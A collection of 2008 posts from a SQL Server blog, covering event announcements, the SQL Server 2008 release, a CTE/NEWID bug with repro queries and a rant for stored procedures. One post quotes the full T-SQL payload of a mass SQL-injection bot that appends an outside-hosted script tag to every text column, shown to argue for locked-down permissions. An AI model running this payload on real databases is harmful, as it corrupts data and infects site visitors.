Tony Rogerson's ramblings on SQL Server

In this Live Meeting Allan will be taking a look at some of the more interesting things that are coming our way for Integrations Services in SQL Server 2008.  He will be looking at things like "The Caching Transform", the "Lookup Component", "Change Data Capture", the "Pipeline Limiter" and Threading amongst other things.

URL: https://www323.livemeeting.com/cc/mvp/join?id=MN5RZH&role=attend&pw=KMQ%3A{Z3%23g

Time: 7pm - 8pm UK time.

A presentation by the UK SQL Server User Group (http://sqlserverfaq.com)

It's been a bit of a wait, but it's there now. It's already downloadable by TechNet or MSDN subscribers. 

Here's the press release: http://www.microsoft.com/Presspass/press/2008/aug08/08-06SQLServer2008PR.mspx

More information though the download at this moment in time (6am, Thurs) are still RC0 -> http://www.microsoft.com/sqlserver/2008/en/us/default.aspx

Some really cool stuff in 2008, myself and some of my clients have been holding off on server upgrades specifically to get this version.

Look out for many local events with 2008 content including our very own SQLBits conference and through the SQL Server User Group.

So who remembers when 1GB cost a few £K's? It wasn't that many years ago.

Anyway, thought I'd take the plunge into Windows 2008 and upgrade my rack servers running blogcasts etc...

From http://www.orcalogic.co.uk/asp/default.asp

4 x DELL POWEREDGE 840/2-B123/A

2GB DDR2-667 ECC Module for Dell PowerEdge 840 @ £39.80(+ 17.5% VAT)

Sub Total = £159.20

Not sure there is any excuse anymore for not maxing your boxes server memory out at these silly cheap prices.

I'm giving a Full Day Seminar on the 12th September at the University of Hertfordshire which is just north of London.

For full information see: http://www.sql-server.co.uk/train20080912/default.htm

This is targetted for people new to SQL Server or for those in departments like IT OPS who need to support SQL Server.

The abstract is as follows:-

1. Vote on your top 10 sessions
2. Register for the conference

Training Day

Logo Competition

Get in quick we have limited places!

For interest only to UK folks I guess; found this rather cool website (http://www.trafficengland.com/) which shows live traffic information including traffic signs, weather etc...

Smart!

Tony.

The tens (probably hundreds) of thousands of sites being affected by the automated SQL Injection robot (http://www.computerworld.com.au/index.php/id;683627551) will almost certainly have one thing in common - they didn't in the most part use stored procedures and instead used embedded SQL or LINQ generated SQL.

Anyway, have a look at the SQL (http://isc.sans.org/diary.html?storyid=4565) that this exploit uses....

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+
"<script src=hxxp://www. adsitelo .com/b.js></script>")
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor 

Starting a fresh, a new login with no permissions the first thing you have to do in order to get your app working when you've not used stored procedures is (ok, we'd use groups but the point I'm getting across is the login being used needs permission on the base tables)....

grant select on {table} to {login}
grant insert on {table} to {login}
grant update on {table} to {login}
grant delete on {table} to {login}

What does that mean? Well, before you did any grants if you run this...

select *
from syscolumns

You would have got "0" rows returned because you don't have permission to those objects! So, the automated bot will have had nothing to work with, nothing to infect, it wouldn't know your schema - by using stored procedures you will get this same behaviour! You'll see the procs but you can't do select * from {proc}.

Next time you are in an argument about whether or not to use stored procedures remember the 10's more like 100's of thousands of sites that have been caught out when they wouldn't have had the problem with this injection if they'd used proper structure and security through stored procedures. 

This is yet another reason why you shouldn't use LINQ to generate the SQL, ALWAYS USE STORED PROCEDURES!

I know I'm on a loser with this one because the developers argument is always about flexibility, frankly - sod flexibility - what's the point of flexibility when you've opened up your database to any application or code that specific login can execute.

Security in today's environments HAS to be of paramount important - the number 1 priority so - use the tools at hand to make for a secure environment and stop dismissing the use of stored procedures with rants about them being inflexible, extra typing etc...

This really isn't a rant at anybody, it's a rant at "the profession"; for the past 15 years I've consistently gone through debate after debate from developers as to why use stored procedures and I think the debate really now has to be concluded - developers - stop being lazy!

Using non-deterministic functions in CTE's gives incorrect results, this follows on from two things - Itzik Ben Gan has raised a good Connect item that highlights a problem with NEWID() (https://connect.microsoft.com/SQLServer/feedback/ViewFeedback.aspx?FeedbackID=350485) and also my series of performance related CTE acticles that highlight the problem caused by the way SQL Server does it's inline expansion.

In my article on CTE when using ROW_NUMBER() and self-joins performance: http://sqlblogcasts.com/blogs/tonyrogerson/archive/2008/05/17/non-recursive-common-table-expressions-performance-sucks-2-row-number-is-executed-number-of-cte-references-x-number-of-rows-from-the-anchor.aspx I demonstrated the sequence generator was being executed multiple times when self-joining, but what I wasn't aware of is that when using a non-deterministic function to ORDER on all hell breaks loose...

A bug in the behaviour when using a non-deterministic function in the OVER ORDER BY clause yields inaccurate results.

Check it out...

select 1 as id, 1 as d

into #t

union all select 1, 2 as d

union all select 1, 3 as d

union all select 1, 4 as d

union all select 1, 5 as d

union all select 1, 6 as d

union all select 1, 7 as d

union all select 2, 1 as d

union all select 2, 2 as d

union all select 2, 3 as d

union all select 2, 4 as d

union all select 2, 5 as d

union all select 2, 6 as d

union all select 2, 7 as d

select *, row_number() over( order by newid() ) as rn

into #x

from #t

This gives the correct results, both occurrances of rn should give the same value...

;with t2 ( id, d, rn )

as (

    select *

    from #x

    )

select *

from t2 a

    inner join t2 b

        on b.id = a.id

       and b.d  = a.d

order by a.rn

But using the CTE it gives the wrong results because the sequence generation is run twice (check the plan).

;with t2 ( id, d, rn )

as (

    select *, row_number() over( order by newid() ) as rn

    from #t

    )

select *

from t2 a

    inner join t2 b

        on b.id = a.id

       and b.d  = a.d

order by a.rn

My advice is clear - always look to using a temporary table as the anchor clause; doing so means CTE's are only really useful when using recursion, see the following articles:

http://sqlblogcasts.com/blogs/tonyrogerson/archive/2008/05/17/non-recursive-common-table-expressions-performance-sucks-1-cte-self-join-cte-sub-query-inline-expansion.aspx

http://sqlblogcasts.com/blogs/tonyrogerson/archive/2008/05/17/non-recursive-common-table-expressions-performance-sucks-2-row-number-is-executed-number-of-cte-references-x-number-of-rows-from-the-anchor.aspx 

I think the answer from Microsoft perspective is to improve the way inline expansion works.

The sponsor pack is now available for the SQLBits Cubed event (http://www.sqlbits.com/sponsor/sponsorpack.pdf). SQLBits is the leading SQL Server conference in the UK, September we will see upto 450 delegates with 20 sessions in 4 tracks at a great new conference venue in Hatfield which is just north of London.

There are many levels of sponsorship, from a 3 minute "on repeat" WMV file played in between sessions to full Platinum sponsorship which gives you the 450 seater Auditorium for an hour over the lunch.

SQLBits is a free to attend conference gearer around Microsoft SQL Server; the delegates are from small, medium and enterprise size companies; we have a mix of Developers, DBA's and Architects, oh and people who all the jobs in one.

Registration for SQLBits Cubed and Speaker submissions will be opening soon.

Please pass this request for sponsor communication on to anybody you think may benefit or be interested in sponsoring SQLBits - the leading UK SQL Server conference.

Independently there will be a training day on the Friday (12th Sept) run by a number of training providers - if you are a training provider and are interested in taking a room for a full day seminar then ping me an email tonyrogerson@torver.net.

I cannot emphasise enought the importance of understanding the absolute basic security principles when developing applications that connect to and run SQL against any database product.

If you are doing application development that requires database access and don't fully understand the term "SQL Injection" then really - stop what you are doing; you are doing in code the equivalent of going out and buying a car then driving it away when you've had no driving lessons and don't understand the basics - accelerator and braking. SQL Injection needs only 15 minutes of your reading time to understand and prevent.

This is not a web server problem, it's not a database problem - it's a human coder problem and as such it can only be fixed by you.

Extract from Buck Woody's blog: http://blogs.msdn.com/buckwoody/archive/2008/05/30/sql-injection-attacks.aspx

"You might have read recently that there have been ongoing SQL injection attacks against vulnerable web applications occurring over the last few months.  These attacks have received recurring attention in the press as they pop up in various geographies around the world. These attacks do not leverage any SQL Server vulnerabilities or any un-patched vulnerabilities in any Microsoft product – the attack vector is vulnerable custom applications. In fact, SQL Injection is a coding issue that can attack any database system, so it's a good idea to learn how to defend against them.

In order to help you respond to and defend yourself from these attacks, Microsoft has an authoritative blog including talking points and guidance.  You can find this at http://blogs.technet.com/swi/archive/2008/05/29/sql-injection-attack.aspx. "

The SQL Server engine does not work in the same way as the Oracle one; there are lots of differences and also lot's of different "theory" you need to understand that is quite different from Oracle.

A good starting point in terms of a like for like discussion is in this paper from Microsoft:

Solution Guide for Migrating Oracle on UNIX to SQL Server on Windows

Chapter 5 - Developing: Databases - Migrating the Database Architecture 

http://www.microsoft.com/technet/solutionaccelerators/cits/interopmigration/unix/oracleunixtosql/or2sql05.mspx

Even if you aren't migrating it's a good read.

But the most important reads are probably the Inside SQL Server books (http://www.insidesqlserver.com/) and Ken Henderson's "The Guru's Guid to SQL Server Architecture and Internals".

It's going to be a biggy - we are aiming our sights at 450 attendees for this one, a big Auditorium that can hold 450, couple of rooms holding 240 and one for 120 so space is not going to be a problem. We are looking to raise sponsorship to pay for the event so we can make it free to attend again.

Two things, first of all - have a think - does your company fancy sponsoring a highly successful and well attended event, if so - ping me an email to tonyrogerson@torver.net or give me a call on my mobile 0796 816 0362, I'm just finalising the Sponsorship pack so more on that later next week.

Secondly, I was at the Hertfordshire Show yesterday - I really enjoyed the entertainment put on by a group from Norfolk I think they said - they had a collection of different breeds of sheep; well, got this picture and I think it's ideal for a caption competition - so, send your best to me and there is a SQL Server book in it for the best ones - nothing too rude please :)

Come and join me and many thousands of others at this great yearly event held at Rothamsted Park in Harpenden.

Pipe Bands and Solo Piping, Highland Dancing, Sheepdog demonstrations, Falconry, Childrens Circus, Funfair, Classic Cars, Craft Stalls, French Market, Charity Stalls, Commerical Stalls, Cabor Toss and tug of war.

Beneficiaries are the local charities:

Harpenden Lions Life Skills Programme
St. Francis' Hospice, Berkamsted
Help 4 Heroes
Local youth charities

Where:

http://www.harplions.com/

Cost, £3.50 in advance or £6 on the gate.

Using the ROW_NUMBER() function in a non recursive CTE gives a very big performance degradation because the Sequence Generation is executed not once as you'd expect but for once for every row in the anchor starting results, example - if the anchor query returns 588 rows to the CTE then the Sequence Generator will be executed for every reference of the CTE multiplied by 588!

Check this query:

with Trans ( row_no, id, salesperson_id, tran_date, clear_date, amount, transaction_types_id, account_id )

as (

    select row_no = row_number() over( order by account_id, tran_date, id ), id, salesperson_id, tran_date, clear_date, amount, transaction_types_id, account_id

    from Transactions

    where account_id between 1000 and 1020

    )

select t1.*,

       running_amount = coalesce(

                         (  select sum( amount )

                            from Trans t2

                            where t2.row_no < t1.row_no

                              and t2.account_id = t1.account_id ), 0 )

                        + amount

from Trans t1

order by account_id, row_no

go

The results of SET STATISTICS PROFILE ON is as follows: